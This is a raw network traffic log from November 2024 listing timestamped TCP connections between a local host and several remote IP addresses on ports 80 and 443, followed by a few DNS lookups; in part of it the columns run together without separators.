Nov 26, 2024 09:33:18.150751114 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.150844097 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.150968075 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.154453039 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.154540062 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.154810905 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.158045053 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.158163071 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.158206940 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.161506891 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.161660910 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.161912918 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.165030003 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.165149927 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.165205002 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.168396950 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.168514013 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.168557882 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.171847105 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.171955109 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.172149897 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.175260067 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.175355911 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.175410032 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.178796053 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.178863049 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.178996086 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.182024002 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.182147026 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.182373047 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.185559034 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.185628891 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.185674906 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.188868999 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.188946009 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.188993931 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.192271948 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.192365885 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.192433119 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.195657015 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.195780993 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.195836067 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.199063063 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.199232101 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.199307919 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.202454090 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.202579021 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.202626944 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.205877066 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.205990076 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.206031084 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.209317923 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.209441900 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.209557056 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.212879896 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.212894917 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.212979078 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.216099024 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.216214895 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.216260910 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.219566107 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.219666004 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.219913006 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.222939014 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.223041058 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.223112106 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.226360083 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.226455927 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.226661921 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.229774952 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.229895115 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.229937077 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.233194113 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.233309984 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.233386993 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.236592054 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.236691952 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.236740112 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.240005016 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.240097046 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.240431070 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.243407011 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.243500948 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.243561983 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.246876955 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.246954918 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.247013092 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.250238895 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.250298977 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.250602961 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.338778019 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.338859081 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.338939905 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.340049028 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.340151072 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.340209007 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.342705011 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.342825890 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.342879057 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.345382929 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.345501900 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.345571995 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.348028898 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.348046064 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.348098040 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.350471020 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.350594044 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.351140022 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.353008032 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.353053093 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.353132010 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.355479956 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.355600119 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.355757952 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.357922077 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.357959986 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.358211040 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.360423088 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.360528946 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.360580921 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.362896919 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.362968922 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.363029003 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.365077972 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.365200996 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.365257978 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.367419004 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.367615938 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.367657900 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.369796038 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.369946003 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.370161057 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.380804062 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.380856037 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.380873919 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.380886078 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.380898952 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.380911112 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.380945921 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.380976915 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.380985975 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.380996943 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.381037951 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.381041050 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.381119013 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.381236076 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.383661032 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.383848906 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.383903027 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.385551929 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.385725975 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.387279987 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.387773991 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.387876987 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.389389038 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.389991999 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.390053988 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.390125036 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.392426014 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.392447948 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.392534971 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.394552946 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.394622087 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.394674063 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.396716118 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.396836042 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.396883011 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.398979902 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.399120092 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.399308920 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.401330948 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.401376963 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.401454926 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.403537989 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.403693914 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.403749943 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.405818939 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.405942917 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.406086922 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.407952070 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.408133030 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.408214092 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.410240889 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.410326004 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.410373926 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.412468910 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.412549973 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.412595987 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.414696932 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.414742947 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.414813042 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.417273998 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.417443037 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.417496920 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.419338942 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.419471979 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.419524908 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.421426058 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.421572924 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.421627998 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.423711061 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.423832893 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.423882008 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.425952911 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.426099062 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.426148891 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.428232908 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.428252935 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.428297997 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.430504084 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.430577993 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.430632114 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.432629108 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.487834930 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.667723894 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:19.370095968 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:19.490170002 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:19.490267038 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:19.490770102 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:19.613598108 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:20.764657021 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:20.783932924 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:20.903964996 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:21.189790010 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:21.237828016 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:21.735521078 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:21.735568047 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:21.735640049 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:21.753828049 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:21.753848076 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.062887907 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.062982082 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.069006920 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.069020033 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.069305897 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.115520000 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.126260996 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.167341948 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.523736954 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.523818016 CET44349713172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.523885012 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.532444000 CET49713443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.551218033 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:23.671524048 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.961576939 CET8049712193.122.6.168192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.963968992 CET49714443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.964030027 CET44349714172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:23.964090109 CET49714443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.964421034 CET49714443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:23.964436054 CET44349714172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:24.003462076 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:25.225162983 CET44349714172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:25.254821062 CET49714443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:25.254858971 CET44349714172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:25.683938026 CET44349714172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:25.684010029 CET44349714172.67.177.134192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:25.684858084 CET49714443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:25.685224056 CET49714443192.168.2.8172.67.177.134
                                                                                                                                                                      Nov 26, 2024 09:33:25.689826965 CET4971280192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:25.691135883 CET4971580192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:47.981312037 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:47.981328011 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.428266048 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.428353071 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:49.430799007 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:49.430814028 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.431024075 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.432746887 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:49.479332924 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.942435980 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.942513943 CET44349730149.154.167.220192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:49.942584038 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:49.948767900 CET49730443192.168.2.8149.154.167.220
                                                                                                                                                                      Nov 26, 2024 09:33:55.771116018 CET4971580192.168.2.8193.122.6.168
                                                                                                                                                                      Nov 26, 2024 09:33:56.217504978 CET4973180192.168.2.845.80.158.30
                                                                                                                                                                      Nov 26, 2024 09:33:56.337872982 CET804973145.80.158.30192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:56.338011980 CET4973180192.168.2.845.80.158.30
                                                                                                                                                                      Nov 26, 2024 09:33:56.344841957 CET4973180192.168.2.845.80.158.30
                                                                                                                                                                      Nov 26, 2024 09:33:56.350992918 CET4973180192.168.2.845.80.158.30
                                                                                                                                                                      Nov 26, 2024 09:33:56.465641975 CET804973145.80.158.30192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:56.472419024 CET804973145.80.158.30192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:56.473304987 CET804973145.80.158.30192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:57.664963007 CET804973145.80.158.30192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:57.722353935 CET4973180192.168.2.845.80.158.30
                                                                                                                                                                      Nov 26, 2024 09:34:02.674192905 CET804973145.80.158.30192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:34:02.674285889 CET4973180192.168.2.845.80.158.30
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 09:32:47.979490995 CET | 59380 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:32:48.126389980 CET | 53 | 59380 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:32:54.681189060 CET | 56180 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:32:54.999164104 CET | 53 | 56180 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:33:15.807049990 CET | 56647 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:33:16.127003908 CET | 53 | 56647 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:33:19.222898006 CET | 64373 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 09:33:19.363226891 CET | 53 | 64373 | 1.1.1.1 | 192.168.2.8
Nov 26, 2024 09:33:21.594911098 CET | 53607 | 53 | 192.168.2.8 | 1.1.1.1
